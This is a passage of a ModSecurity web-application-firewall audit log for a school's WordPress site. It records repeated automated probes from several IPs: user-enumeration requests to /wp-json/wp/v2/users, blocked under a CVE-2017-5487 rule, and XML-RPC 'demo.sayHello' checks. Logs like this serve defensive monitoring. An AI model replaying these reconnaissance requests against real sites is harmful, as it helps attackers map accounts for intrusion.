Gecko) Chrome/119.0.0.0 Safari/537.36 --6404904c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6404904c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426387813365 3246 (- - -) Stopwatch2: 1747426387813365 3246; combined=1364, p1=473, p2=859, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6404904c-Z-- --3f01e539-A-- [17/May/2025:03:13:12 +0700] aCecWMe47ocjCGWTS4Y_QwAAAFc 103.236.140.4 54836 103.236.140.4 8181 --3f01e539-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f01e539-C-- demo.sayHello --3f01e539-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f01e539-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426392343397 4853 (- - -) Stopwatch2: 1747426392343397 4853; combined=3696, p1=452, p2=3043, p3=24, p4=27, p5=89, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f01e539-Z-- --f9d7363e-A-- [17/May/2025:03:13:24 +0700] aCecZMe47ocjCGWTS4Y_RAAAAEA 103.236.140.4 54840 103.236.140.4 8181 --f9d7363e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f9d7363e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9d7363e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426404880024 2952 (- - -) Stopwatch2: 1747426404880024 2952; combined=1377, p1=470, p2=869, p3=0, p4=0, p5=37, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9d7363e-Z-- --4c55177b-A-- [17/May/2025:03:13:29 +0700] aCecaUE0LfP59mkCzg42DQAAANA 103.236.140.4 54844 103.236.140.4 8181 --4c55177b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.241 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4c55177b-C-- demo.sayHello --4c55177b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c55177b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426409675526 5330 (- - -) Stopwatch2: 1747426409675526 5330; combined=4029, p1=515, p2=3301, p3=28, p4=32, p5=90, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c55177b-Z-- --2128f139-A-- [17/May/2025:03:13:31 +0700] aCeca8e47ocjCGWTS4Y_RQAAAFg 103.236.140.4 54846 103.236.140.4 8181 --2128f139-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2128f139-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2128f139-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426411844868 3378 (- - -) Stopwatch2: 1747426411844868 3378; combined=1433, p1=495, p2=900, p3=0, p4=0, p5=38, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2128f139-Z-- --d47a2d79-A-- [17/May/2025:03:13:39 +0700] aCecc9hEtho3ciA0wehefQAAAI0 103.236.140.4 54852 103.236.140.4 8181 --d47a2d79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.15 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d47a2d79-C-- demo.sayHello --d47a2d79-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d47a2d79-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426419363621 5113 (- - -) Stopwatch2: 1747426419363621 5113; combined=3843, p1=453, p2=3181, p3=23, p4=26, p5=93, sr=67, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d47a2d79-Z-- --d7e29433-A-- [17/May/2025:03:14:38 +0700] aCecrthEtho3ciA0wehefwAAAJY 103.236.140.4 54860 103.236.140.4 8181 --d7e29433-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 184.154.4.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 184.154.4.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d7e29433-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7e29433-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426478965716 3364 (- - -) Stopwatch2: 1747426478965716 3364; combined=1441, p1=484, p2=919, p3=0, p4=0, p5=37, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7e29433-Z-- --bc3fa81c-A-- [17/May/2025:03:16:15 +0700] aCedD0E0LfP59mkCzg42DwAAAM4 103.236.140.4 54872 103.236.140.4 8181 --bc3fa81c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bc3fa81c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc3fa81c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426575075334 3570 (- - -) Stopwatch2: 1747426575075334 3570; combined=1495, p1=485, p2=973, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc3fa81c-Z-- --4302b245-A-- [17/May/2025:03:16:19 +0700] aCedE9hEtho3ciA0weheggAAAIA 103.236.140.4 54876 103.236.140.4 8181 --4302b245-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4302b245-C-- demo.sayHello --4302b245-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4302b245-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426579120908 5450 (- - -) Stopwatch2: 1747426579120908 5450; combined=4056, p1=544, p2=3294, p3=29, p4=33, p5=93, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4302b245-Z-- --6337e421-A-- [17/May/2025:03:18:38 +0700] aCednkE0LfP59mkCzg42FgAAAMQ 103.236.140.4 54898 103.236.140.4 8181 --6337e421-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6337e421-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6337e421-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426718888374 2762 (- - -) Stopwatch2: 1747426718888374 2762; combined=1262, p1=424, p2=810, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6337e421-Z-- --9dd4c077-A-- [17/May/2025:03:18:40 +0700] aCedoMe47ocjCGWTS4Y_SgAAAE0 103.236.140.4 54900 103.236.140.4 8181 --9dd4c077-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9dd4c077-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9dd4c077-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426720446114 2534 (- - -) Stopwatch2: 1747426720446114 2534; combined=1086, p1=380, p2=681, p3=0, p4=0, p5=25, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9dd4c077-Z-- --0f6b503b-A-- [17/May/2025:03:18:44 +0700] aCedpNe6THFz1hsaJaLZVQAAAAI 103.236.140.4 54904 103.236.140.4 8181 --0f6b503b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0f6b503b-C-- demo.sayHello --0f6b503b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f6b503b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426724210589 5625 (- - -) Stopwatch2: 1747426724210589 5625; combined=4195, p1=596, p2=3338, p3=28, p4=33, p5=114, sr=118, sw=86, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f6b503b-Z-- --414e7b3d-A-- [17/May/2025:03:18:49 +0700] aCedqce47ocjCGWTS4Y_TAAAAEY 103.236.140.4 54910 103.236.140.4 8181 --414e7b3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --414e7b3d-C-- demo.sayHello --414e7b3d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --414e7b3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426729598067 5425 (- - -) Stopwatch2: 1747426729598067 5425; combined=4027, p1=538, p2=3271, p3=30, p4=33, p5=92, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --414e7b3d-Z-- --ae543d3f-A-- [17/May/2025:03:20:23 +0700] aCeeB9e6THFz1hsaJaLZWAAAAAc 103.236.140.4 54924 103.236.140.4 8181 --ae543d3f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ae543d3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae543d3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426823592616 3223 (- - -) Stopwatch2: 1747426823592616 3223; combined=1375, p1=482, p2=861, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae543d3f-Z-- --4c08ec67-A-- [17/May/2025:03:20:31 +0700] aCeeD0E0LfP59mkCzg42GgAAAMY 103.236.140.4 54928 103.236.140.4 8181 --4c08ec67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.242 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4c08ec67-C-- demo.sayHello --4c08ec67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c08ec67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426831621615 6594 (- - -) Stopwatch2: 1747426831621615 6594; combined=4647, p1=604, p2=3799, p3=36, p4=41, p5=99, sr=79, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c08ec67-Z-- --3d5dfb32-A-- [17/May/2025:03:21:03 +0700] aCeeL9hEtho3ciA0wehehQAAAIc 103.236.140.4 54932 103.236.140.4 8181 --3d5dfb32-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3d5dfb32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d5dfb32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426863901174 2856 (- - -) Stopwatch2: 1747426863901174 2856; combined=1287, p1=437, p2=819, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d5dfb32-Z-- --609afd36-A-- [17/May/2025:03:21:07 +0700] aCeeM9hEtho3ciA0wehehgAAAI4 103.236.140.4 54936 103.236.140.4 8181 --609afd36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --609afd36-C-- demo.sayHello --609afd36-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --609afd36-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426867388828 4726 (- - -) Stopwatch2: 1747426867388828 4726; combined=3709, p1=465, p2=3030, p3=22, p4=24, p5=97, sr=69, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --609afd36-Z-- --2ef20e06-A-- [17/May/2025:03:23:36 +0700] aCeeyEE0LfP59mkCzg42HQAAANA 103.236.140.4 54946 103.236.140.4 8181 --2ef20e06-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 